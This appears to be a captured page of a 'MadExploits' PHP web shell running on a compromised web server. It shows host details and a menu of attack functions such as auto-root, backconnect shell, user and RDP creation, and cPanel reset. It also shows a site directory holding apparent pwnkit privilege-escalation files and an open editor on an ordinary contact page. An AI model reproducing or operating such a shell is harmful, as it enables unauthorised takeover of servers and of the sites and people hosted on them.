Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 13.59.170.228
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
worldresourceB /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Products.php
17.36
KB
-rw-r--r--
about.php
3.98
KB
-rw-r--r--
categories.php
1.36
KB
-rw-r--r--
contact.php
6.16
KB
-rw-r--r--
index.php
22.74
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
service.php
6.11
KB
-rw-r--r--
style.css
118.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact.php
<?php include("includes/header.php");?> <!--Breadcrumb Area Start--> <div class="breadcrumb-area breadcrumb-bg"> <div class="container"> <div class="row"> <div class="col-12"> <ul class="breadcrumb-menu"> <li><a href="index.php">Home</a></li> <li>Contact Us</li> </ul> <h2>Contact Us</h2> </div> </div> </div> </div> <!--Breadcrumb Area Start--> <!--Contact Area Start--> <div class="contact-us-area ptb-50"> <div class="container"> <div class="row"> <div class="col-lg-3 col-md-4"> <div class="store-information"> <div class="store-title"> <h4>Store information</h4> <div class="communication-info"> <!--Single Communication Start--> <div class="single-communication"> <div class="communication-icon"> <i class="fa fa-map-marker"></i> </div> <div class="communication-text"> <span> <strong>01. Islamabad</strong> <br> # 197, Street # 9, Sector G-15/3, Islamabad, Pakistan. 44000 <br><strong> Tel: +92 51 2328374 <br>Cell: +92 3008502233</strong> </span> </div> </div> <div class="single-communication"> <div class="communication-icon"> <i class="fa fa-map-marker"></i> </div> <div class="communication-text"> <span> <strong>02. Brussels</strong><br> Rue des Poissonniers 13, 1000 Brussels. <strong>Sales: 180020 94949</strong> </span> </div> </div> <div class="single-communication"> <div class="communication-icon"> <i class="fa fa-map-marker"></i> </div> <div class="communication-text"> <span> <strong>03. Dubai</strong><br> 23 Floor, Burlington Tower, Al Abraj St - Dubai, United Arab Emirates. </span> </div> </div> <div class="single-communication"> <div class="communication-icon"> <i class="fa fa-map-marker"></i> </div> <div class="communication-text"> <span> <strong>04. China</strong><br> WanXiang Lighting City Office Block, 3rd Floor C04 Lecong Town shunde District, Foshan City, Guangdong. <br><strong>Tel: 0757 - 2833 3048</strong> </span> </div> </div> <!--Single Communication End--> </div> </div> </div> </div> <div class="col-lg-9 col-md-8"> <div class="content-wrapper"> <div class="page-content"> <div class="contact-form"> <div class="contact-form-title"> <h3>Contact us</h3> </div> <form id="contact-form" action="https://demo.hasthemes.com/indecor-preview/indecor/mail.php" method="post"> <div class="row"> <div class="col-lg-6"> <div class="contact-form-style mb-20"> <input name="name" placeholder="Full Name" type="text"> </div> </div> <div class="col-lg-6"> <div class="contact-form-style mb-20"> <input name="email" placeholder="Eail Address" type="email"> </div> </div> <div class="col-lg-12"> <div class="contact-form-style mb-20"> <input name="subject" placeholder="Subject" type="text"> </div> </div> <div class="col-lg-12"> <div class="contact-form-style"> <textarea name="message" placeholder="Message"></textarea> <button class="default-btn" type="submit"><span>SEND MESSAGE</span></button> </div> </div> </div> </form> <p class="form-messege"></p> </div> </div> </div> </div> </div> </div> </div> <!--Contact Area end --> <?php include("includes/footer.php");?>
Close